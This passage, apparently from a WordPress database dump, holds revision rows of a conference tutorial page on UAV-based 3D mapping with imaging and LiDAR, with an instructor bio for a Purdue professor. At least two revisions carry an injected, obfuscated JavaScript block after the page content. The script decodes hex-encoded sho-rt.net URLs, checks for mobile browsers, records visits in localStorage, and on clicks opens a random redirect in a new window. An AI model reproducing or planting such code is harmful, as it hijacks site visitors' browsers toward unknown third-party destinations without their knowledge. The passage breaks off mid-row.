Sustainable Environment (CE-CAUSE). He is also the Associate Director of Purdue University’s Joint Transportation Research Program (JTRP). Dr. Habib’s research interests span the fields of terrestrial and aerial mobile mapping systems. He has been focusing on modeling the perspective geometry of non-traditional imaging scanners, automatic matching and change detection, automatic calibration of low-cost digital cameras, object recognition in imagery and point cloud data, LiDAR mapping, and integrating photogrammetric data with other sensors/datasets (e.g., GNSS/INS, GIS databases, multi- and hyper-spectral sensors, and LiDAR). Over the last seven years, he has been involved in the development, integration, and utilization of wheel-based and UAV-based mobile mapping systems for a wide range of applications in precision agriculture, geometric documentation of transportation corridors, digital forestry, crash scene reconstruction, cultural heritage documentation, environmental management, and infrastructure monitoring.</span></p>\n<p><!-- /wp:paragraph -->[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','UAV-based 3D mapping using imaging and LiDAR systems: challenges, data processing, and applications','','inherit','closed','closed','','3701-revision-v1','','','2023-02-04 02:33:58','2023-02-04 02:33:58','',3701,'https://gsw2023.com/?p=3739',0,'revision','',0),
(3740,1,'2023-02-04 02:41:26','2023-02-04 02:41:26','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3702\" img_size=\"1200x1000\"][vc_column_text]</p>\n<h5>Instructor</h5>\n<h6>Ayman F. Habib</h6>\n<h6>Thomas A. Page Professor in Civil Engineering</h6>\n<h6>Lyles School of Civil Engineering, Purdue University, USA</h6>\n<p>[/vc_column_text][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"71\"][vc_row_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Scope</h5>\n<p>&nbsp;</p>\n<h6 style=\"text-align: justify;\"><strong>The continuous developments in direct geo-referencing technology (i.e., integrated Global Navigation Satellite Systems – GNSS – and Inertial Navigation Systems – INS) and remote sensing systems (i.e., passive and active imaging sensors in the visible and infrared range – RGB cameras, hyperspectral push-broom scanners, and laser scanning) are providing the professional geospatial community with ever-growing opportunities to generate accurate 3D information with rich set of attributes. These advances are also coupled with improvement in the sensors’ performance, reduction in the associated cost, and miniaturization of such sensors. Aside from the sensing systems, we are also enjoying the emerging of promising platforms such as Uncrewed Aerial Vehicles (UAVs). This tutorial will provide an overview of recent activities focusing on UAV-based mapping while highlighting: 1) algorithmic developments for improved system calibration of multi-sensor/multi-platform UAV-based mapping; 2) challenges facing UAV-based Structure-from-Motion strategies for deriving point clouds from imagery; 3) benefits of integrating imaging and LiDAR systems onboard UAVs;  4) applications of UAV-based remote sensing systems for a wide range of applications including precision agriculture, documentation of crash scenes, shoreline monitoring, digital forestry, and mapping of highway construction work zones; and 5) interactive visualization of multi-sensor/multi-platform/temporal geospatial data for improved comprehension of delivered products from UAV-based mobile mapping systems.</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<!-- wp:heading {\"level\":1} --></p>\n<h5><span style=\"font-size: 18pt;\"><strong>Instractor BIO</strong></span></h5>\n<h5 style=\"text-align: justify;\"><span style=\"font-size: 18pt;\"><strong><!-- /wp:heading --> <!-- wp:paragraph --></strong></span></h5>\n<h6 style=\"text-align: justify;\"><span style=\"text-align: justify; font-size: 12pt;\">Dr. Habib is the Thomas A. Page professor of Civil Engineering at Purdue University and the Co-Director of the Civil Engineering Center for Applications of UAS for a Sustainable Environment (CE-CAUSE). He is also the Associate Director of Purdue University’s Joint Transportation Research Program (JTRP). Dr. Habib’s research interests span the fields of terrestrial and aerial mobile mapping systems. He has been focusing on modeling the perspective geometry of non-traditional imaging scanners, automatic matching and change detection, automatic calibration of low-cost digital cameras, object recognition in imagery and point cloud data, LiDAR mapping, and integrating photogrammetric data with other sensors/datasets (e.g., GNSS/INS, GIS databases, multi- and hyper-spectral sensors, and LiDAR). Over the last seven years, he has been involved in the development, integration, and utilization of wheel-based and UAV-based mobile mapping systems for a wide range of applications in precision agriculture, geometric documentation of transportation corridors, digital forestry, crash scene reconstruction, cultural heritage documentation, environmental management, and infrastructure monitoring.</span></h6>\n<p><!-- /wp:paragraph -->[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','UAV-based 3D mapping using imaging and LiDAR systems: challenges, data processing, and applications','','inherit','closed','closed','','3701-revision-v1','','','2023-02-04 02:41:26','2023-02-04 02:41:26','',3701,'https://gsw2023.com/?p=3740',0,'revision','',0),
(3741,1,'2023-02-04 02:42:23','2023-02-04 02:42:23','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3702\" img_size=\"1200x1000\"][vc_column_text]</p>\n<h5>Instructor</h5>\n<h6>Ayman F. Habib</h6>\n<h6>Thomas A. Page Professor in Civil Engineering</h6>\n<h6>Lyles School of Civil Engineering, Purdue University, USA</h6>\n<p>[/vc_column_text][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"71\"][vc_row_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Scope</h5>\n<p>&nbsp;</p>\n<h6 style=\"text-align: justify;\"><strong>The continuous developments in direct geo-referencing technology (i.e., integrated Global Navigation Satellite Systems – GNSS – and Inertial Navigation Systems – INS) and remote sensing systems (i.e., passive and active imaging sensors in the visible and infrared range – RGB cameras, hyperspectral push-broom scanners, and laser scanning) are providing the professional geospatial community with ever-growing opportunities to generate accurate 3D information with rich set of attributes. These advances are also coupled with improvement in the sensors’ performance, reduction in the associated cost, and miniaturization of such sensors. Aside from the sensing systems, we are also enjoying the emerging of promising platforms such as Uncrewed Aerial Vehicles (UAVs). This tutorial will provide an overview of recent activities focusing on UAV-based mapping while highlighting: 1) algorithmic developments for improved system calibration of multi-sensor/multi-platform UAV-based mapping; 2) challenges facing UAV-based Structure-from-Motion strategies for deriving point clouds from imagery; 3) benefits of integrating imaging and LiDAR systems onboard UAVs;  4) applications of UAV-based remote sensing systems for a wide range of applications including precision agriculture, documentation of crash scenes, shoreline monitoring, digital forestry, and mapping of highway construction work zones; and 5) interactive visualization of multi-sensor/multi-platform/temporal geospatial data for improved comprehension of delivered products from UAV-based mobile mapping 